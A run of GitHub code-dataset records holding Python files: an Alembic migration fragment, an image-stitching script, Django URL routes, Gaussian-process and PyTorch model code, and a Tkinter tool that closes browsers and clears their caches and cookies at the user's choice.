# ### end Alembic commands ###\n", "repo_name": "a5hik/db", "sub_path": "alembic/versions/4d1e3cd2d723_restore_price_column.py", "file_name": "4d1e3cd2d723_restore_price_column.py", "file_ext": "py", "file_size_in_byte": 703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.MONEY", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "38972185975", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 19 16:11:29 2019\n\n@author: Carter\n\"\"\"\nfrom computeH import computeH\nfrom warpImage import warpImage\nimport numpy as np\nimport cv2\n\ndef scale_down(lis,image):\n for i in range(len(lis)):\n lis[i,0] = lis[i,0]/image.shape[0]*2\n lis[i,1] = lis[i,1]/image.shape[1]*2\n return lis\n\ndef scale_down_2(t1,t2):\n max_val = max(np.max(t1),np.max(t2))\n t1 = t1/max_val\n t2 = t2/max_val\n return t1,t2\n\ndef reverse(cc1):\n cc1_rev = np.empty(cc1.shape)\n for i in range(len(cc1)):\n cc1_rev[i,0] = cc1[i,1] \n cc1_rev[i,1] = cc1[i,0]\n return cc1_rev\n \nt1 = np.load('points1.npy')\nt2 = np.load('points2.npy')\n\nimg1 = cv2.imread('wdc1.jpg')\nimg2 = cv2.imread('wdc2.jpg')\n\nt1,t2 = scale_down_2(t1,t2)\nt1 = scale_down(t1.T,img1)\nt2 = scale_down(t2.T,img2)\n\nt1 = reverse(t1.T)\nt2 = reverse(t2.T)\nt1 = t1.T\nt2 = t2.T\n\nh = computeH(t1,t2)\n\nfinal, merged = warpImage(img1,img2,h)\n\ncv2.imshow(\"final\", final)\ncv2.waitKey()\ncv2.imshow(\"merged\", merged)\ncv2.waitKey()\ncv2.destroyAllWindows()\n", "repo_name": "carterprice2/Computer_Vision", "sub_path": "PS3/Price_Leon_Carter_PS3_py/final_test.py", "file_name": "final_test.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.max", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "computeH.computeH", "line_number": 46, "usage_type": "call"}, {"api_name": "warpImage.warpImage", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "30555719356", "text": "\"\"\"Appliances urls\"\"\"\nfrom django.urls import path, include\nfrom appliances import views\n\n\nurlpatterns = [\n path('', views.AppliancesHomeView.as_view(), name=\"appliances_home\"),\n path('add_task', views.AddTaskFormView.as_view(), name=\"add_task\"),\n path('add_task_input/', views.add_task_input, name=\"add_task_input\"),\n path('check_task', views.check_task, name=\"check_task\"),\n path('edit_task_description', views.edit_task_description, name=\"edit_task_description\"),\n path('delete_task/', views.delete_task, name=\"delete_task\"),\n path('edit_appliance', views.EditApplianceFormView.as_view(), name=\"edit_appliance\"),\n path('edit_appliance_status', views.EditApplianceStatusFormView.as_view(), name=\"edit_appliance_status\"),\n path('notation_chart/', views.get_notations_chart, name='chart_notations'),\n # path('add_company', views.ContactsAddCompanyFormView.as_view(), name=\"add_company\"),\n # path('delete_company', views.ContactsDeleteCompanyFormView.as_view(), name=\"delete_company\"),\n # path('add_contact', views.ContactsAddContactFormView.as_view(), name=\"add_contact\"),\n # path('edit_contact', views.ContactsEditContactFormView.as_view(), name=\"edit_contact\"),\n # path('delete_contact', views.ContactsDeleteContactFormView.as_view(), name=\"delete_contact\"),\n # path('add_mission', views.ContactsAddMissionFormView.as_view(), name=\"add_mission\"),\n # path('delete_mission', views.ContactsDeleteMissionFormView.as_view(), name=\"delete_mission\"),\n]\n", "repo_name": "MickaPch/OC_Projet13_Fireworks", "sub_path": "appliances/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1545, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "appliances.views.AppliancesHomeView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "appliances.views.AppliancesHomeView", "line_number": 7, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "appliances.views.AddTaskFormView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "appliances.views.AddTaskFormView", "line_number": 8, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "appliances.views.add_task_input", "line_number": 9, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "appliances.views.check_task", "line_number": 10, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "appliances.views.edit_task_description", "line_number": 11, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "appliances.views.delete_task", "line_number": 12, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceFormView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceFormView", "line_number": 13, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceStatusFormView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "appliances.views.EditApplianceStatusFormView", "line_number": 14, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "appliances.views.get_notations_chart", "line_number": 15, "usage_type": "attribute"}, {"api_name": "appliances.views", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "28127631209", "text": "import numpy as np\nimport gpflow\nimport tensorflow as tf\n\nfrom core.svgp.svgp import SVGP\nfrom core.svgp.blk_svgp import BlockSVGP\nfrom core.svgp.multi_gpu import MultiGPU\nfrom core.svgp.reflection import ReflectionFeatures, ReflectionSingleFeatures\nfrom core.utils.utils import InducingPoints\nfrom utils.utils import get_kemans_init, median_distance_global\n\n\ndef get_model(args, train_x, train_y):\n kern = get_kern(args, train_x)\n lik = gpflow.likelihoods.Gaussian(name='lik')\n lik.variance = 0.1\n num_data = train_x.shape[0]\n tf_train_x, tf_train_y = data_iterator(train_x, train_y, min(args.batch_size, num_data))\n Z = get_kemans_init(train_x, args.num_inducing)\n\n if args.model == 'svgp':\n feat = InducingPoints(Z, name='features')\n model = SVGP(tf_train_x, tf_train_y, kern, lik, feat=feat, XY_tensor=True, num_data=num_data, name='model')\n elif args.model == 'ref':\n feat = ReflectionFeatures([Z] * args.J, U=np.eye(Z.shape[-1]), name='feature')\n model = BlockSVGP(tf_train_x, tf_train_y, kern, lik, feat, XY_tensor=True, num_data=num_data, name='model')\n elif args.model == 'refmg':\n assert args.num_gpu > 1\n Sigma = np.cov(train_x, rowvar=False)\n _, U = np.linalg.eigh(Sigma)\n def feat_fn(z, i, name):\n return ReflectionSingleFeatures(z, U, i, args.J, name)\n model = MultiGPU(tf_train_x, tf_train_y, kern, lik, feat_fn, [Z]*args.J, args.num_gpu,\n XY_tensor=True, num_data=num_data, name='model')\n else:\n raise NotImplementedError\n\n if isinstance(model, MultiGPU):\n loss, grads_and_vars = model.build_objective_and_grads()\n obs_var = lik.variance.constrained_tensor\n print_dict = {'loss': loss, 'obs_var': obs_var}\n\n global_step = tf.Variable(0, trainable=False)\n optimizer = tf.train.AdamOptimizer(args.learning_rate)\n train_op = optimizer.apply_gradients(grads_and_vars)\n return model, print_dict, train_op, global_step\n else:\n loss = model.objective / num_data\n obs_var = lik.variance.constrained_tensor\n print_dict = {'loss': loss, 'obs_var': obs_var}\n\n global_step = tf.Variable(0, trainable=False)\n optimizer = tf.train.AdamOptimizer(args.learning_rate)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return model, print_dict, train_op, global_step\n\n\ndef get_kern(args, train_x):\n ls = median_distance_global(train_x)\n if args.kern == 'rbf':\n kern = gpflow.kernels.RBF(train_x.shape[1], lengthscales=ls, name='rbf')\n elif args.kern == 'matern32':\n kern = gpflow.kernels.Matern32(train_x.shape[1], lengthscales=ls, name='matern32')\n else:\n raise NotImplementedError\n return kern\n\n\ndef data_iterator(numpy_train_x, numpy_train_y, batch_size):\n iterator = tf.data.Dataset.from_tensor_slices(\n (numpy_train_x.astype(gpflow.settings.float_type),\n numpy_train_y.astype(gpflow.settings.float_type))).shuffle(buffer_size=10000)\n iterator = iterator.batch(batch_size, drop_remainder=True).repeat()\n train_x, train_y = iterator.make_one_shot_iterator().get_next()\n return train_x, train_y\n", "repo_name": "ssydasheng/Harmonic-Kernel-Decomposition", "sub_path": "utils/model_utils.py", "file_name": "model_utils.py", "file_ext": "py", "file_size_in_byte": 3210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gpflow.likelihoods.Gaussian", "line_number": 15, "usage_type": "call"}, {"api_name": "gpflow.likelihoods", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.utils.get_kemans_init", "line_number": 19, "usage_type": "call"}, {"api_name": "core.utils.utils.InducingPoints", "line_number": 22, "usage_type": "call"}, {"api_name": "core.svgp.svgp.SVGP", "line_number": 23, "usage_type": "call"}, {"api_name": "core.svgp.reflection.ReflectionFeatures", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 25, "usage_type": "call"}, {"api_name": "core.svgp.blk_svgp.BlockSVGP", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg.eigh", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 30, "usage_type": "attribute"}, {"api_name": "core.svgp.reflection.ReflectionSingleFeatures", "line_number": 32, "usage_type": "call"}, {"api_name": "core.svgp.multi_gpu.MultiGPU", "line_number": 33, "usage_type": "call"}, {"api_name": "core.svgp.multi_gpu.MultiGPU", "line_number": 38, "usage_type": "argument"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 53, "usage_type": "attribute"}, {"api_name": "utils.utils.median_distance_global", "line_number": 59, "usage_type": "call"}, {"api_name": "gpflow.kernels.RBF", "line_number": 61, "usage_type": "call"}, {"api_name": "gpflow.kernels", "line_number": 61, "usage_type": "attribute"}, {"api_name": "gpflow.kernels.Matern32", "line_number": 63, "usage_type": "call"}, {"api_name": "gpflow.kernels", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gpflow.settings", "line_number": 71, "usage_type": "attribute"}, {"api_name": "gpflow.settings", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "35587447833", "text": "import torch\nfrom torch import nn \nfrom torchvision import datasets, transforms\n\n\n# prepocesing image\n\ntransform=transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n\nbatch_size=64 \ntrainset = datasets.FashionMNIST('Fashion_MNIST/', download=True, train=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n\n# Download and load the test data\ntestset = datasets.FashionMNIST('Fashion_MNIST/', download=True, train=False, transform=transform)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=True)\nprint(\"hello\")\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1=nn.Linear(784,256)\n self.hidden2=nn.Linear(256,128)\n self.output=nn.Linear(128,10)\n self.softmax=nn.Softmax(dim=1)\n self.activation=nn.ReLU()\n def forward(self,x):\n x = self.hidden1(x)\n x=self.activation(x)\n x=self.hidden2(x)\n x=self.activation(x)\n x=self.output(x)\n output=self.softmax(x)\n return(output)\n\n\n\nmodel=FashionNetwork()\nprint(model)\ncriterion=nn.NLLLoss()\n\n\nfrom torch import optim\noptimizer=optim.Adam(model.parameters())\noptimizer.defaults\n\noptimizer=optim.Adam(model.parameters(),lr=3e-3)\noptimizer.defaults\nepoch=10\n\nfor _ in range(epoch):\n running_loss=0\n for image, label in trainloader:\n optimizer.zero_grad()\n image=image.view(image.shape[0],-1)\n pred=model(image)\n loss=criterion(pred,label)\n loss.backward()\n optimizer.step()\n running_loss +=loss.item()\n else:\n print(f'Training loss: {running_loss/len(trainloader):.4f}')\n\ntorch.tensor([[1]]).item()\n\n\n\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1 = nn.Linear(784, 256)\n self.hidden2 = nn.Linear(256, 128)\n self.output = nn.Linear(128, 10)\n self.log_softmax = nn.LogSoftmax()\n self.activation = nn.ReLU()\n self.drop = nn.Dropout(p=0.25)\n def forward(self, x):\n x = self.hidden1(x)\n x = self.activation(x)\n x = self.drop(x)\n x = self.hidden2(x)\n x = self.activation(x)\n x = self.drop(x)\n x = self.output(x)\n output = self.log_softmax(x)\n return output\n\n\n\nmodel = FashionNetwork()\nmodel\n\nimport torch.nn.functional as F\n\n\nclass FashionNetwork(nn.Module):\n def __init__(self):\n super().__init__()\n self.hidden1 = nn.Linear(784,256)\n self.hidden2 = nn.Linear(256,128)\n self.output = nn.Linear(128,10)\n \n \n def forward(self,x):\n x = F.relu(self.hidden1(x))\n x = F.relu(self.hidden2(x))\n x = F.log_softmax(self.output(x))\n return x\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "GroverAruquipa/Msc_script_MS", "sub_path": "NN-pytorch.py", "file_name": "NN-pytorch.py", "file_ext": "py", "file_size_in_byte": 2867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 9, "usage_type": "name"}, {"api_name": "torchvision.datasets.FashionMNIST", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.FashionMNIST", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 21, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.LogSoftmax", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 99, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 110, "usage_type": "name"}]} +{"seq_id": "71620727525", "text": "import os\r\nimport subprocess\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nimport json\r\nimport datetime\r\n\r\nlog_file = \"cleanup_log.txt\"\r\nconfig_file = \"config.json\"\r\n\r\ndefault_config_data = {\r\n \"java\": True,\r\n \"ie\": True,\r\n \"edge\": True,\r\n \"chrome\": False,\r\n \"firefox\": False,\r\n \"clear_java_cache\": True,\r\n \"clear_ie_temp\": True,\r\n \"clear_edge_cache\": True,\r\n \"clear_chrome_cache\": False,\r\n \"clear_firefox_cache\": False\r\n}\r\n\r\ntry:\r\n with open(config_file, \"r\") as config:\r\n default_options = json.load(config)\r\nexcept FileNotFoundError:\r\n with open(config_file, \"w\") as config:\r\n json.dump(default_config_data, config, indent=4)\r\n default_options = default_config_data\r\n\r\ndef print_to_log_window(message):\r\n log_window.configure(state='normal')\r\n log_window.insert(tk.END, message + \"\\n\")\r\n log_window.see(tk.END)\r\n log_window.configure(state='disabled')\r\n root.update_idletasks()\r\n\r\ndef kill_processes(process_names):\r\n deleted_files = []\r\n for process_name in process_names:\r\n print_to_log_window(f\"Killing {process_name}...\")\r\n result = subprocess.run(['taskkill', '/F', '/IM', process_name], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(f\"Killed: {process_name}\")\r\n return deleted_files\r\n\r\ndef clear_cache(cache_paths):\r\n deleted_files = []\r\n for cache_path in cache_paths:\r\n if os.path.exists(cache_path):\r\n if os.path.isdir(cache_path):\r\n print_to_log_window(f\"Clearing cache directory: {cache_path}\")\r\n deleted_files.extend(list_files_in_directory(cache_path))\r\n for root_dir, dirs, files in os.walk(cache_path):\r\n for file in files:\r\n file_path = os.path.join(root_dir, file)\r\n os.remove(file_path)\r\n deleted_files.append(f\"Deleted: {file_path}\")\r\n else:\r\n print_to_log_window(f\"Removing cache file: {cache_path}\")\r\n os.remove(cache_path)\r\n deleted_files.append(f\"Deleted: {cache_path}\")\r\n return deleted_files\r\n\r\ndef clear_cookies(cookie_paths):\r\n deleted_files = []\r\n for cookie_path in cookie_paths:\r\n if os.path.exists(cookie_path):\r\n print_to_log_window(f\"Removing cookie file: {cookie_path}\")\r\n os.remove(cookie_path)\r\n deleted_files.append(f\"Deleted: {cookie_path}\")\r\n return deleted_files\r\n\r\ndef list_files_in_directory(directory):\r\n deleted_files = []\r\n for root, dirs, files in os.walk(directory):\r\n for file in files:\r\n file_path = os.path.join(root, file)\r\n deleted_files.append(f\"Deleted: {file_path}\")\r\n return deleted_files\r\n\r\ndef apply_actions():\r\n selected_actions = []\r\n deleted_files = []\r\n\r\n if java_var.get():\r\n selected_actions.extend(['javaw.exe', 'java.exe'])\r\n if ie_var.get():\r\n selected_actions.append('iexplore.exe')\r\n if edge_var.get():\r\n selected_actions.append('msedge.exe')\r\n if chrome_var.get():\r\n selected_actions.append('chrome.exe')\r\n if firefox_var.get():\r\n selected_actions.append('firefox.exe')\r\n\r\n deleted_files.extend(kill_processes(selected_actions))\r\n\r\n if clear_java_cache_var.get():\r\n print_to_log_window(\"Clearing Java Cache...\")\r\n result = subprocess.run(['javaws', '-uninstall'], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(\"Deleted: Java Cache\")\r\n\r\n if clear_ie_temp_var.get():\r\n print_to_log_window(\"Clearing IE Temporary Files and Cookies...\")\r\n result = subprocess.run(['RunDll32.exe', 'InetCpl.cpl,ClearMyTracksByProcess', '255'], capture_output=True, text=True)\r\n if result.returncode == 0:\r\n deleted_files.append(\"Deleted: IE Temporary Files and Cookies\")\r\n\r\n if clear_edge_cache_var.get():\r\n edge_cache_path = os.path.join(os.environ['LocalAppData'], 'Packages', 'Microsoft.MicrosoftEdge_*', 'AC', 'MicrosoftEdge', 'Cache')\r\n edge_cookie_path = os.path.join(os.environ['LocalAppData'], 'Packages', 'Microsoft.MicrosoftEdge_*', 'AC', 'MicrosoftEdge', 'Cookies')\r\n\r\n edge_cache_paths = [\r\n edge_cache_path,\r\n os.path.join(os.environ['LocalAppData'], 'Microsoft', 'Edge', 'User Data', 'Default', 'Cache'),\r\n ]\r\n\r\n print_to_log_window(\"Clearing Edge Cache and Cookies...\")\r\n deleted_files.extend(clear_cache(edge_cache_paths))\r\n deleted_files.extend(clear_cookies([edge_cookie_path]))\r\n\r\n if clear_chrome_cache_var.get():\r\n chrome_cache_path = os.path.join(os.environ['LocalAppData'], 'Google', 'Chrome', 'User Data', 'Default', 'Cache')\r\n chrome_cookie_path = os.path.join(os.environ['LocalAppData'], 'Google', 'Chrome', 'User Data', 'Default', 'Cookies')\r\n\r\n print_to_log_window(\"Clearing Chrome Cache and Cookies...\")\r\n deleted_files.extend(clear_cache([chrome_cache_path]))\r\n deleted_files.extend(clear_cookies([chrome_cookie_path]))\r\n\r\n if clear_firefox_cache_var.get():\r\n firefox_cache_path = os.path.join(os.environ['LocalAppData'], 'Mozilla', 'Firefox', 'Profiles')\r\n firefox_cache_path = os.path.join(firefox_cache_path, os.listdir(firefox_cache_path)[0], 'cache2')\r\n\r\n print_to_log_window(\"Clearing Firefox Cache...\")\r\n deleted_files.extend(clear_cache([firefox_cache_path]))\r\n\r\n print_to_log_window(\"Cleanup completed.\")\r\n with open(log_file, 'a') as f:\r\n timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n f.write(f\"\\n{timestamp}\\n\")\r\n for line in deleted_files:\r\n f.write(line + \"\\n\")\r\n\r\nroot = tk.Tk()\r\nroot.title('CacheW Cleanup Utility')\r\n\r\nlog_window = tk.Text(root, wrap='word', height=15, width=50)\r\nlog_window.configure(state='disabled')\r\nlog_window.pack()\r\n\r\njava_var = tk.BooleanVar(value=default_options[\"java\"])\r\nie_var = tk.BooleanVar(value=default_options[\"ie\"])\r\nedge_var = tk.BooleanVar(value=default_options[\"edge\"])\r\nchrome_var = tk.BooleanVar(value=default_options[\"chrome\"])\r\nfirefox_var = tk.BooleanVar(value=default_options[\"firefox\"])\r\nclear_java_cache_var = tk.BooleanVar(value=default_options[\"clear_java_cache\"])\r\nclear_ie_temp_var = tk.BooleanVar(value=default_options[\"clear_ie_temp\"])\r\nclear_edge_cache_var = tk.BooleanVar(value=default_options[\"clear_edge_cache\"])\r\nclear_chrome_cache_var = tk.BooleanVar(value=default_options[\"clear_chrome_cache\"])\r\nclear_firefox_cache_var = tk.BooleanVar(value=default_options[\"clear_firefox_cache\"])\r\n\r\ntk.Checkbutton(root, text='Java', variable=java_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Internet Explorer', variable=ie_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Edge', variable=edge_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Chrome', variable=chrome_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Firefox', variable=firefox_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Java cache', variable=clear_java_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Internet Explorer temporary files', variable=clear_ie_temp_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Edge cache', variable=clear_edge_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Chrome cache', variable=clear_chrome_cache_var).pack(anchor='w')\r\ntk.Checkbutton(root, text='Clear Firefox cache', variable=clear_firefox_cache_var).pack(anchor='w')\r\n\r\ntk.Button(root, text='Apply', command=apply_actions).pack(side='left', expand=True, fill='x')\r\ntk.Button(root, text='Exit', command=root.destroy).pack(side='right', expand=True, fill='x')\r\n\r\nroot.mainloop()\r\n", "repo_name": "hclivess/cachew", "sub_path": "cachew.py", "file_name": "cachew.py", "file_ext": "py", "file_size_in_byte": 7740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 35, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 58, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 102, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 118, "usage_type": "attribute"}, {"api_name": 